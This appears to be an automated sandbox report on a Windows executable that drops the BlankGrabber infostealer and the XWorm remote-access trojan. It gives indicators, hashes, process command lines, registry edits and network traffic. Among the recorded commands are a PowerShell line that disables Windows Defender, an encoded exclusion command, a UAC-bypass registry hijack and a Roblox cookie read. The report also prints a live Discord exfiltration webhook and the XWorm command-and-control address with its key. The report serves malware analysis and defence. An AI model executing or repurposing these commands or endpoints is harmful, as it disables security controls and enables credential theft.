File name:

VerifiedAssetLeaks.exe

Full analysis: https://app.any.run/tasks/c53f1222-61a0-457e-8f1b-dceb2ef903e5
Verdict: Malicious activity
Threats:

Blank Grabber is an infostealer written in Python. It is designed to steal a wide array of data, such as browser login credentials, crypto wallets, Telegram sessions, and Discord tokens. It is an open-source malware, with its code available on GitHub and regularly receiving updates. Blank Grabber builder’s simple interface lets threat actors even with basic skills to deploy it and conduct attacks.

Analysis date: March 24, 2025, 19:51:08
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
remote
xworm
blankgrabber
stealer
susp-powershell
screenshot
discord
evasion
uac
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, 4 sections
MD5:

93F581C34664F4578C5159FCC2935210

SHA1:

284228329160963D19EB02B85D73FCE355EED2FE

SHA256:

889C83BD1253E7049C84DD7F8B05B652606EB87444501EC4BAEBC822B1DF2340

SSDEEP:

98304:kpeg1xAClcj1x0YD20tQTpm0xm3gJpMzPILLi6iRIxCGkb31fS76vkeyWps9GOwo:Ky56DXx

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executing a file with an untrusted certificate

      • Built.exe (PID: 2140)
      • Built.exe (PID: 4172)
    • BlankGrabber has been detected

      • Built.exe (PID: 2140)
      •      .scr (PID: 7196)
    • Adds path to the Windows Defender exclusion list

      • Built.exe (PID: 4172)
      • cmd.exe (PID: 2316)
      • cmd.exe (PID: 4300)
    • Create files in the Startup directory

      • Built.exe (PID: 4172)
    • Antivirus name has been found in the command line (generic signature)

      • cmd.exe (PID: 5960)
    • Changes settings for reporting to Microsoft Active Protection Service (MAPS)

      • powershell.exe (PID: 720)
    • Changes settings for checking scripts for malicious actions

      • powershell.exe (PID: 720)
    • Changes settings for sending potential threat samples to Microsoft servers

      • powershell.exe (PID: 720)
    • Changes antivirus protection settings for downloading files from the Internet (IOAVProtection)

      • powershell.exe (PID: 720)
    • Changes settings for real-time protection

      • powershell.exe (PID: 720)
    • Changes Controlled Folder Access settings

      • powershell.exe (PID: 720)
    • Changes settings for protection against network attacks (IPS)

      • powershell.exe (PID: 720)
    • Changes Windows Defender settings

      • cmd.exe (PID: 5960)
      • cmd.exe (PID: 2316)
      • cmd.exe (PID: 4300)
    • Steals credentials from Web Browsers

      • Built.exe (PID: 4172)
    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 7760)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 7208)
    • Resets Windows Defender malware definitions to the base version

      • MpCmdRun.exe (PID: 7492)
    • Actions looks like stealing of personal data

      • Built.exe (PID: 4172)
    • XWORM has been detected (SURICATA)

      • Connection-11500.exe (PID: 2148)
    • XWORM has been detected (YARA)

      • Connection-11500.exe (PID: 2148)
    • Bypass User Account Control (Modify registry)

      • reg.exe (PID: 4728)
    • Bypass User Account Control (ComputerDefaults)

      • ComputerDefaults.exe (PID: 7860)
    • BLANKGRABBER has been detected (SURICATA)

      • Built.exe (PID: 4172)
  • SUSPICIOUS

    • Process drops legitimate windows executable

      • VerifiedAssetLeaks.exe (PID: 4724)
      • Built.exe (PID: 2140)
      • Built.exe (PID: 4172)
      •      .scr (PID: 7352)
      •      .scr (PID: 7196)
    • Starts POWERSHELL.EXE for commands execution

      • VerifiedAssetLeaks.exe (PID: 4724)
      • cmd.exe (PID: 5960)
      • cmd.exe (PID: 2316)
      • cmd.exe (PID: 4300)
      • cmd.exe (PID: 7348)
      • cmd.exe (PID: 7760)
      • cmd.exe (PID: 7848)
      • cmd.exe (PID: 5984)
      • cmd.exe (PID: 5868)
      • cmd.exe (PID: 7768)
    • Base64-obfuscated command line is found

      • VerifiedAssetLeaks.exe (PID: 4724)
      • cmd.exe (PID: 7760)
    • The process drops C-runtime libraries

      • Built.exe (PID: 2140)
      •      .scr (PID: 7352)
      •      .scr (PID: 7196)
    • Reads security settings of Internet Explorer

      • VerifiedAssetLeaks.exe (PID: 4724)
    • BASE64 encoded PowerShell command has been detected

      • VerifiedAssetLeaks.exe (PID: 4724)
      • cmd.exe (PID: 7760)
    • Executable content was dropped or overwritten

      • Built.exe (PID: 2140)
      • VerifiedAssetLeaks.exe (PID: 4724)
      • Built.exe (PID: 4172)
      • csc.exe (PID: 7980)
      •      .scr (PID: 7352)
      •      .scr (PID: 7196)
    • Process drops python dynamic module

      • Built.exe (PID: 2140)
      •      .scr (PID: 7352)
      •      .scr (PID: 7196)
    • Application launched itself

      • Built.exe (PID: 2140)
      •      .scr (PID: 7352)
      •      .scr (PID: 7196)
    • Starts CMD.EXE for commands execution

      • Built.exe (PID: 4172)
      •      .scr (PID: 7844)
    • Found strings related to reading or modifying Windows Defender settings

      • Built.exe (PID: 4172)
      •      .scr (PID: 7844)
    • Script disables Windows Defender's IPS

      • cmd.exe (PID: 5960)
    • Script disables Windows Defender's real-time protection

      • cmd.exe (PID: 5960)
    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 2316)
      • cmd.exe (PID: 4300)
    • Get information on the list of running processes

      • Built.exe (PID: 4172)
      • cmd.exe (PID: 2092)
      • cmd.exe (PID: 7188)
      • cmd.exe (PID: 7380)
    • Starts application with an unusual extension

      • cmd.exe (PID: 7416)
      • cmd.exe (PID: 7992)
      • cmd.exe (PID: 7848)
      • cmd.exe (PID: 8004)
      • cmd.exe (PID: 7336)
      • cmd.exe (PID: 7804)
      •      .scr (PID: 7352)
      • ComputerDefaults.exe (PID: 7860)
      •      .scr (PID: 7196)
    • Uses WMIC.EXE to obtain Windows Installer data

      • cmd.exe (PID: 7332)
      • cmd.exe (PID: 7224)
    • Uses SYSTEMINFO.EXE to read the environment

      • cmd.exe (PID: 7508)
    • Uses NETSH.EXE to obtain data on the network

      • cmd.exe (PID: 7472)
    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 7760)
    • Accesses antivirus product name via WMI (SCRIPT)

      • WMIC.exe (PID: 7880)
    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 7980)
    • Captures screenshot (POWERSHELL)

      • powershell.exe (PID: 7208)
    • Uses WMIC.EXE to obtain operating system information

      • cmd.exe (PID: 7720)
    • Uses WMIC.EXE to obtain computer system information

      • cmd.exe (PID: 2320)
    • Accesses operating system name via WMI (SCRIPT)

      • WMIC.exe (PID: 8128)
    • Contacting a server suspected of hosting an CnC

      • Connection-11500.exe (PID: 2148)
    • Connects to unusual port

      • Connection-11500.exe (PID: 2148)
    • The executable file from the user directory is run by the CMD process

      • rar.exe (PID: 7756)
    • Accesses video controller name via WMI (SCRIPT)

      • WMIC.exe (PID: 1072)
    • Checks for external IP

      • svchost.exe (PID: 2196)
      • Built.exe (PID: 4172)
    • Accesses product unique identifier via WMI (SCRIPT)

      • WMIC.exe (PID: 7560)
    • Uses WMIC.EXE to obtain a list of video controllers

      • cmd.exe (PID: 7508)
    • Uses WEVTUTIL.EXE to query events from a log or log file

      • cmd.exe (PID: 856)
      • cmd.exe (PID: 8140)
    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 2504)
      • cmd.exe (PID: 8004)
      • cmd.exe (PID: 780)
    • Changes default file association

      • reg.exe (PID: 4728)
  • INFO

    • Reads the computer name

      • VerifiedAssetLeaks.exe (PID: 4724)
      • Connection-11500.exe (PID: 2148)
      • MpCmdRun.exe (PID: 7492)
    • The sample compiled with english language support

      • VerifiedAssetLeaks.exe (PID: 4724)
      • Built.exe (PID: 2140)
      • Built.exe (PID: 4172)
      •      .scr (PID: 7352)
      •      .scr (PID: 7196)
    • Process checks computer location settings

      • VerifiedAssetLeaks.exe (PID: 4724)
    • Checks supported languages

      • VerifiedAssetLeaks.exe (PID: 4724)
      • Connection-11500.exe (PID: 2148)
      • tree.com (PID: 7844)
      • tree.com (PID: 5112)
      • tree.com (PID: 1184)
      • MpCmdRun.exe (PID: 7492)
      • tree.com (PID: 7952)
      • tree.com (PID: 4400)
      • tree.com (PID: 7748)
      • csc.exe (PID: 7980)
      • rar.exe (PID: 7756)
      • cvtres.exe (PID: 6388)
    • Create files in a temporary directory

      • Built.exe (PID: 2140)
      • MpCmdRun.exe (PID: 7492)
      • cvtres.exe (PID: 6388)
      • csc.exe (PID: 7980)
      • rar.exe (PID: 7756)
      • Built.exe (PID: 4172)
      •      .scr (PID: 7352)
      •      .scr (PID: 7844)
      •      .scr (PID: 7196)
    • Autorun file from Startup directory

      • Built.exe (PID: 4172)
    • Creates files in the program directory

      • Built.exe (PID: 4172)
    • Reads the machine GUID from the registry

      • Connection-11500.exe (PID: 2148)
      • csc.exe (PID: 7980)
      • rar.exe (PID: 7756)
    • The Powershell gets current clipboard

      • powershell.exe (PID: 7828)
    • Checks the directory tree

      • tree.com (PID: 7844)
      • tree.com (PID: 5112)
      • tree.com (PID: 1184)
      • tree.com (PID: 7952)
      • tree.com (PID: 4400)
      • tree.com (PID: 7748)
    • Reads security settings of Internet Explorer

      • WMIC.exe (PID: 7880)
      • ComputerDefaults.exe (PID: 7860)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 2420)
      • powershell.exe (PID: 780)
      • powershell.exe (PID: 2960)
      • powershell.exe (PID: 720)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 2960)
      • powershell.exe (PID: 720)
      • powershell.exe (PID: 2420)
      • powershell.exe (PID: 780)
      • powershell.exe (PID: 928)
      • powershell.exe (PID: 7864)
    • Found Base64 encoded access to Windows Defender via PowerShell (YARA)

      • powershell.exe (PID: 780)
    • Displays MAC addresses of computer network adapters

      • getmac.exe (PID: 4428)
    • Manual execution by a user

      •      .scr (PID: 7352)
    • Reads the software policy settings

      • slui.exe (PID: 2320)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

XWorm

(PID) Process(2148) Connection-11500.exe
C284.67.89.127:7000
Keys
AES<123456789>
Options
Splitter<Xwormmm>
Sleep time3
USB drop nameXWorm V5.6
Mutex8j0uExLhYZXyeos4
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (61.6)
.dll | Win32 Dynamic Link Library (generic) (14.6)
.exe | Win32 Executable (generic) (10)
.exe | Win16/32 Executable Delphi generic (4.6)
.exe | Generic Win/DOS Executable (4.4)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 0000:00:00 00:00:00
ImageFileCharacteristics: No relocs, Executable, No line numbers, No symbols, 32-bit, No debug
PEType: PE32
LinkerVersion: 6
CodeSize: 2048
InitializedDataSize: 8016384
UninitializedDataSize: -
EntryPoint: 0x14d1
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows GUI
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
245
Monitored processes
121
Malicious processes
12
Suspicious processes
7

Behavior graph

Click at the process to see the details
start verifiedassetleaks.exe powershell.exe no specs conhost.exe no specs #XWORM connection-11500.exe #BLANKGRABBER built.exe #BLANKGRABBER built.exe cmd.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs tasklist.exe no specs conhost.exe no specs tasklist.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs tree.com no specs wmic.exe no specs reg.exe no specs systeminfo.exe no specs cmd.exe no specs tasklist.exe no specs netsh.exe no specs conhost.exe no specs powershell.exe no specs tree.com no specs cmd.exe no specs conhost.exe no specs tree.com no specs cmd.exe no specs conhost.exe no specs tree.com no specs cmd.exe no specs conhost.exe no specs tree.com no specs cmd.exe no specs conhost.exe no specs tree.com no specs tiworker.exe no specs mpcmdrun.exe no specs csc.exe cvtres.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs getmac.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs rar.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs      .scr      .scr no specs svchost.exe cmd.exe no specs conhost.exe no specs reg.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs cmd.exe no specs conhost.exe no specs wevtutil.exe no specs cmd.exe no specs conhost.exe no specs computerdefaults.exe no specs computerdefaults.exe no specs computerdefaults.exe #BLANKGRABBER      .scr cmd.exe no specs conhost.exe no specs wevtutil.exe no specs cmd.exe no specs conhost.exe no specs reg.exe no specs      .scr no specs slui.exe verifiedassetleaks.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
208\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
720powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
780"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAbABoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAbQB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AawBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAZwB1ACMAPgA="C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeVerifiedAssetLeaks.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
780C:\WINDOWS\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f"C:\Windows\System32\cmd.exe     .scr
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
840\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
856C:\WINDOWS\system32\cmd.exe /c "wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text"C:\Windows\System32\cmd.exe     .scr
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
900\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
928powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITYC:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1072wmic path win32_VideoController get nameC:\Windows\System32\wbem\WMIC.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
WMI Commandline Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\wbem\wmic.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
1184tree /A /FC:\Windows\System32\tree.comcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Tree Walk Utility
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\tree.com
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ulib.dll
c:\windows\system32\fsutilext.dll
Total events
68 835
Read events
68 824
Write events
7
Delete events
4

Modification events

(PID) Process:(7964) TiWorker.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing
Operation:writeName:SessionIdHigh
Value:
31169782
(PID) Process:(7964) TiWorker.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing
Operation:writeName:SessionIdLow
Value:
641254744
(PID) Process:(4728) reg.exeKey:HKEY_CLASSES_ROOT\ms-settings\shell\open\command
Operation:writeName:DelegateExecute
Value:
(PID) Process:(7860) ComputerDefaults.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation:writeName:SlowContextMenuEntries
Value:
6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000
(PID) Process:(7860) ComputerDefaults.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(7860) ComputerDefaults.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(7860) ComputerDefaults.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(6668) reg.exeKey:HKEY_CLASSES_ROOT\ms-settings\shell\open\command
Operation:delete keyName:(default)
Value:
(PID) Process:(6668) reg.exeKey:HKEY_CLASSES_ROOT\ms-settings\shell\open
Operation:delete keyName:(default)
Value:
(PID) Process:(6668) reg.exeKey:HKEY_CLASSES_ROOT\ms-settings\shell
Operation:delete keyName:(default)
Value:
Executable files
58
Suspicious files
34
Text files
42
Unknown types
0

Dropped files

PID
Process
Filename
Type
2140Built.exeC:\Users\admin\AppData\Local\Temp\_MEI21402\VCRUNTIME140.dllexecutable
MD5:862F820C3251E4CA6FC0AC00E4092239
SHA256:36585912E5EAF83BA9FEA0631534F690CCDC2D7BA91537166FE53E56C221E153
4724VerifiedAssetLeaks.exeC:\Windows\Connection-11500.exeexecutable
MD5:6499BD9252F3CC55332E272DF8CA68EB
SHA256:8C9A4C1087FFE8FB06C11DAC6ACD5C9F99DAA8D38525C4F9D936A2DDC1F1BF1E
4724VerifiedAssetLeaks.exeC:\Windows\Built.exeexecutable
MD5:31A4447CDD1BD8539C7F6B0FFDA611B5
SHA256:621FB365A7AB569C6D7058680940BAB57247AF806C911392984DC2FCFED46B10
2140Built.exeC:\Users\admin\AppData\Local\Temp\_MEI21402\_bz2.pydexecutable
MD5:94309558EB827E8315D0F201BBE7F2B1
SHA256:7857736CEFD36B645191871F7D7C9256E1C940788CC1978609248B562E8B40D4
2140Built.exeC:\Users\admin\AppData\Local\Temp\_MEI21402\_queue.pydexecutable
MD5:1073D3147F0D6A1880B78A5A5695FC70
SHA256:7F381A79FBFDBCABEC751773CB211D1B9D36F287AE9F46E07A46D4116F4D5B04
2140Built.exeC:\Users\admin\AppData\Local\Temp\_MEI21402\_socket.pydexecutable
MD5:FCFDF8CD83A8D506A4483A72EB57026C
SHA256:C0AC0BDC8778BC2F5218359AD3C19F0D2C38A9871D643163B35A1D567D966F81
2140Built.exeC:\Users\admin\AppData\Local\Temp\_MEI21402\_ctypes.pydexecutable
MD5:FC40D41AFF12417142C0256E536B4A1A
SHA256:1846030E35037D8CBAACB640FA9AC99AF5D26C0AADC09E3C2AF04DB7CA7909DC
2140Built.exeC:\Users\admin\AppData\Local\Temp\_MEI21402\_hashlib.pydexecutable
MD5:933A6A12D695C7D91EF78A936AB229C7
SHA256:0D969EEC2E3931794F7349019B32EC80055414B80010BE3A6BA42A99B3319850
2140Built.exeC:\Users\admin\AppData\Local\Temp\_MEI21402\_lzma.pydexecutable
MD5:042AC1B18A7F6FFF8ED09EC9EFA9E724
SHA256:0F44F360662DAAC7DB8ACBCE44557035E7E170B1309A4931DDE07CFAAD6019A0
2140Built.exeC:\Users\admin\AppData\Local\Temp\_MEI21402\_sqlite3.pydexecutable
MD5:1E16D084725D9B79F17CCB1996DF7410
SHA256:35C55180C6D21A6E1ACE0B1B6834DF29CABB2B1DEC054755A3E8ED369DEF727A
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
26
DNS requests
8
Threats
9

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2104
svchost.exe
GET
200
2.19.11.105:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
204
142.250.184.227:443
https://gstatic.com/generate_204
unknown
4172
Built.exe
GET
200
208.95.112.1:80
http://ip-api.com/json/?fields=225545
unknown
whitelisted
POST
500
20.83.72.98:443
https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail
unknown
xml
512 b
whitelisted
POST
200
162.159.136.232:443
https://discord.com/api/webhooks/1353793163797725204/cpstZdy-fFjLsyW1EzizMWaADisd9_JJIQUF17Pyie8q2OMs4QFBV1xCw9flgDuoY4mG
unknown
whitelisted
POST
500
20.83.72.98:443
https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail
unknown
xml
512 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2104
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
2104
svchost.exe
2.19.11.105:80
crl.microsoft.com
Elisa Oyj
NL
whitelisted
4172
Built.exe
216.58.206.35:443
gstatic.com
GOOGLE
US
whitelisted
2148
Connection-11500.exe
84.67.89.127:7000
Vodafone Limited
GB
malicious
4
System
192.168.100.255:137
whitelisted
2104
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4172
Built.exe
208.95.112.1:80
ip-api.com
TUT-AS
US
whitelisted
4172
Built.exe
162.159.138.232:443
discord.com
CLOUDFLARENET
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 20.73.194.208
whitelisted
google.com
  • 142.250.185.142
whitelisted
crl.microsoft.com
  • 2.19.11.105
  • 2.19.11.120
whitelisted
gstatic.com
  • 216.58.206.35
whitelisted
ip-api.com
  • 208.95.112.1
whitelisted
discord.com
  • 162.159.138.232
  • 162.159.135.232
  • 162.159.137.232
  • 162.159.136.232
  • 162.159.128.233
whitelisted
activation-v2.sls.microsoft.com
  • 20.83.72.98
whitelisted

Threats

PID
Process
Class
Message
2148
Connection-11500.exe
Malware Command and Control Activity Detected
REMOTE [ANY.RUN] Xworm TCP Packet
2196
svchost.exe
Device Retrieving External IP Address Detected
INFO [ANY.RUN] External IP Check (ip-api .com)
2196
svchost.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup Domain in DNS Lookup (ip-api .com)
2196
svchost.exe
Misc activity
ET INFO Observed Discord Domain in DNS Lookup (discord .com)
2196
svchost.exe
Misc activity
ET INFO Discord Chat Service Domain in DNS Lookup (discord .com)
4172
Built.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup ip-api.com
4172
Built.exe
Misc activity
ET INFO Observed Discord Domain (discord .com in TLS SNI)
4172
Built.exe
A Network Trojan was detected
STEALER [ANY.RUN] BlankGrabber (SkochGrabber) Generic External IP Check
4172
Built.exe
Misc activity
ET INFO Observed Discord Service Domain (discord .com) in TLS SNI
No debug info